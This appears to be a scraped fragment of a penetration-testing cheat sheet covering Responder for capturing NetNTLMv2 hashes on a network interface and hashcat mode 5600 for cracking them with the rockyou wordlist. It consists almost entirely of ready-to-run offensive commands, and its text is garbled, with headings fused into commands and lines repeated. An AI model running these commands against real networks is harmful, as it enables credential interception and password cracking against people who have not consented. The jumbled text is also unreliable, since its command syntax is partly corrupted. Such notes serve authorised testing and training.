Responder.py
Capture NTLMv2 Hashes with Responder
sudo responder -I eth0 - rdwvCrack Hash with Hashcat
Responder Analyze Mode
Last updated
sudo responder -I eth0 - rdwvLast updated
hashcat -m 5600 hash rockyou.txt
--help:
MODE | 5600 | NetNTLMv2 | Network Protocolresponder -I eth0 -A